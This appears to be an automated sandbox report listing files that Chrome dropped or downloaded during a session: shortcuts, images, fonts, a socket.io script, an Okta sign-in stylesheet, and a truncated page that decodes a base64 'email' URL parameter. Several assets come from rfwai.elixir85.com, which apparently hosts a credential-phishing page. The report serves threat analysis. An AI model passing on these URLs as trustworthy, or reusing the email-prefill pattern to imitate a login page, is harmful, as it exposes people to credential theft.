                                                        SHA-256:44165708920849DAA891ACD19FF18C40DBF81665ED74C682AB2CB8FAFDDF1725
                                                        SHA-512:F492CA78905CF616D884474FAF69F851860F6F193C5168DD95339A6184470E2703F1B190260B8D7C6B3D9B75D0E23DD5CB997D5EAF8ACC3A08EC3895B28BF25C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,.....k. |...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2693
                                                        Entropy (8bit):4.007840116510876
                                                        Encrypted:false
                                                        SSDEEP:48:8x1dsTQEsHvidAKZdA14tseh7sFiZUkmgqeh7sby+BX:8x0vOn1y
                                                        MD5:D426270D5EFA3AA769E25F33F8929C74
                                                        SHA1:6BE8BFF5A2EC528EFFC8B1E9BC132F21CDA2ED71
                                                        SHA-256:FF8FDE6DF703B7D921FBB61DD7A72960EE6B075EFBF674341ACC8E540D3C13DC
                                                        SHA-512:88395EE4F982B787A86690FD687F764D8CDC2222A3F38D13FA0637A9B3A79936E1FE4FA8456142FD3AA9D76CAC0F74A79A671D6C98466233915C1DAA0B202073
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 18:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2681
                                                        Entropy (8bit):3.997244517196461
                                                        Encrypted:false
                                                        SSDEEP:48:8eOdsTQEA+HvidAKZdA1vehDiZUkwqehty+R:8e1vCTy
                                                        MD5:87EEAA3E216762B055B392E863B4C695
                                                        SHA1:170333B23E3E79DCFBB5E784532E3ADD0D9341BE
                                                        SHA-256:8849376497B20735F78B5C5DC1388309952ADC2610DA737C4FCD667D349F68EB
                                                        SHA-512:159E75CEF0E02A7414B1305B0ECB73EEC15A4550186E89858C8343B54069C29D40C7F14584447C90CB5C44AAFD999A583577DD41D35237F3AC5A5759481600B5
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,.....c. |...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 18:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2681
                                                        Entropy (8bit):3.986071545711568
                                                        Encrypted:false
                                                        SSDEEP:48:8/dsTQEA+HvidAKZdA1hehBiZUk1W1qehvy+C:8uvy9Py
                                                        MD5:C21771A29AC74965563AF21FD25E2B0F
                                                        SHA1:A9F87431B4B85206AF94374AA7EDD3756FBDF589
                                                        SHA-256:D66E5771EEFF2E41767C8C22D2838CEF153223FA75CF79B76C466E7F151C951F
                                                        SHA-512:E519602984D1B49A985A87216ACA46B826A9B255E2E428DB7864878B4EDD378C80EE001ADBA71694B1CB4EF3700D25813854DF5DD6C3CBA2E88EF1AD6821F432
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,....... |...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jul 3 18:06:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2683
                                                        Entropy (8bit):3.9988761250165856
                                                        Encrypted:false
                                                        SSDEEP:48:86dsTQEA+HvidAKZdA1duT+ehOuTbbiZUk5OjqehOuTb1y+yT+:8JvsT/TbxWOvTb1y7T
                                                        MD5:156678B2E3411D654031D7EEDB17ACC8
                                                        SHA1:E6E35BCC79273CD88747CDB0D3D5E94C49FB2518
                                                        SHA-256:D3AC0167CF8DA136A680689930C1AB6B1D61924A8255BD2FBFED7B7DA038B805
                                                        SHA-512:FC7A0B63C48B3F910D08C57270F60155C17CDFA2B239CC9ED76ACE912765A43B974510E690918AF77B55596DF5C1781898D38D9D2479170236B35F065A8BFB3B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,......| |...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):727
                                                        Entropy (8bit):7.573165690842521
                                                        Encrypted:false
                                                        SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                        MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                        SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                        SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                        SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140
                                                        Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                        Category:downloaded
                                                        Size (bytes):28584
                                                        Entropy (8bit):7.992563951996154
                                                        Encrypted:true
                                                        SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                        MD5:17081510F3A6F2F619EC8C6F244523C7
                                                        SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                        SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                        SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/90jodEH2Rir67QW4OuPst51
                                                        Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1469
                                                        Entropy (8bit):4.699888190641274
                                                        Encrypted:false
                                                        SSDEEP:24:hYkCRnSKXxQiWksIeWA9bQG0lExOeojTU4miqd4NN:wndrMJkHjTZmrCNN
                                                        MD5:082A6C3E2DA5C84A7999206296C592FE
                                                        SHA1:5BA03EDB1979C0B2550BB579D8CFDADC60C1F414
                                                        SHA-256:2C4C356320D90201AD8BCF1DD16418D247E89849BF00254A6404A95850472D01
                                                        SHA-512:28D1201EE43E0C06FEE2D7057C8BF6C2163AA9F340A9FF837365512B502E89DFECAF64D658B498E8EADEBEF1E5F731B3AF7DA880442CCD65E8FAEEA31200CFC1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>File loading</title>. <script>. // Function to get the value of a parameter from the URL. function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, " "));. }.. // Get the base64-encoded email parameter from the URL. var base64EmailParam = getParameterByName('email');.. // Decode the base64-encoded email. function decodeEmail(base64Email) {. return atob(base64Email);. }.. // If a base64-encoded email parameter is provided,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (51734)
                                                        Category:downloaded
                                                        Size (bytes):222931
                                                        Entropy (8bit):5.0213311632628725
                                                        Encrypted:false
                                                        SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                        MD5:0329C939FCA7C78756B94FBCD95E322B
                                                        SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                        SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                        SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                        Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):231
                                                        Entropy (8bit):6.725074433303473
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                        MD5:547988BAC5584B4608466D761E16F370
                                                        SHA1:C11BB71049702528402A31027F200184910A7E23
                                                        SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                        SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):727
                                                        Entropy (8bit):7.573165690842521
                                                        Encrypted:false
                                                        SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                        MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                        SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                        SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                        SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):29796
                                                        Entropy (8bit):7.980058333789969
                                                        Encrypted:false
                                                        SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                        MD5:210433A8774859368F3A7B86D125A2A7
                                                        SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                        SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                        SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):93276
                                                        Entropy (8bit):7.997636438159837
                                                        Encrypted:true
                                                        SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                        MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                        SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                        SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                        SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98
                                                        Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (45667)
                                                        Category:downloaded
                                                        Size (bytes):45806
                                                        Entropy (8bit):5.207605835316031
                                                        Encrypted:false
                                                        SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                        MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                        SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                        SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                        SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                        Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):29796
                                                        Entropy (8bit):7.980058333789969
                                                        Encrypted:false
                                                        SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                        MD5:210433A8774859368F3A7B86D125A2A7
                                                        SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                        SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                        SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232
